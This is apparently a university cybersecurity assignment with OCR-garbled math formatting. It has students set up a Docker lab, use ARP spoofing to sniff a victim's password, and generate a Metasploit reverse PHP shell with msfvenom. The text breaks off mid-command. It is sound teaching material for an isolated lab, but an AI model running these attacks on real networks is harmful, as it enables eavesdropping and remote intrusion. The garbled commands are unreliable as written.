CSCI $440$ Cyber Security

$($Spring $2024)$

Assignment $4$

Nam

Score

$10$

Due date: Saturday, ${13}^{th}$ of April $2024$ by $11$:$59$ PM

The purpose of the Assignment $4$ is to understand how network attacks can exploit vulnerabilities in network.

Part $1$: ARP Spoofing Attack

$[5$ points$]$ In order to start your Part $1,$ first create a vulnerable network and pull and run docker images from dockerHub using the following commands $($Use IP address given below$)$:

Create a vulnerable network: docker network create vulnerable $-$attachable $--$subnet $100\mathrm{.}0.\frac{0\mathrm{.}0}{24}$

Attacker: docker run $--$name attacker $-$it $--$rm $--$privileged $-$hostname attacker $--$network vulnerable $--$ip$="100\mathrm{.}0\mathrm{.}0\mathrm{.}2"--$env

DISPLAY$=$$DISPLAY $-v\%$

In this part, show your work how the attacker server can eavesdrop packets coming from Victim to Normal Server in the following steps:

Run a client program $($client$)$ in Victim and a server program $($server$)$ in Normal Server respectively $($client$.c$ and server. $c$ are given$)$ after you compile them $(gcc-$@ client client. $c,$ gcc $-$o server server.c$).$

# Change IP address of server in client.c accordingly to connect to the server!

Run a fake arp$\_$sender program on attacker server $($fake$-1\mathrm{.}1\mathrm{.}11$ is given in the class$).$ Before running, compile the arp$\_$sender$.c$ first.

Run tcpdump program in attacker to watch the packets.

Victim sends a following sentence: "Hello Normal Server: this is my password $=1234$ qwer!" to Normal Server.

Victim communicates with Normal Server by sending continuous messages including "This is a continuous message..$\mathrm{.}1",$ "This is a continuous message... $2",$ "This is a continuous message... $3".$

Attacker finds out all the sent messages whenever the Victim sends a message in tcpdump packets.

The captured screen should show that TCP message is dumped in the attacker's server.

Show all your works by submitting screen shots and descriptions for each step.

Part $2$: Using a Reverse Shell in Metasploit

$[5$ points$]$ Reverse shell allows the attacker listen on the attacker's machine waiting for the target server to connect to the attacker's machine. Perform the attack in the following steps and show all your works in the screen shots and descriptions for each step.

In order to start your Part $2,$ pull and run a docker image from dockerHub for target container server using the following commands $($Use IP address given below$)$:Use Attacker server running for Part $1$ with IP address, $100,0\mathrm{.}0\mathrm{.}2.$

Get a reverse PHP shell on attacker's server: Run the following command to generate a payload in PHP format.

msfvenom $-$p php$/$meterpreter$\_$reverse$\_$tcp LHOST$==<$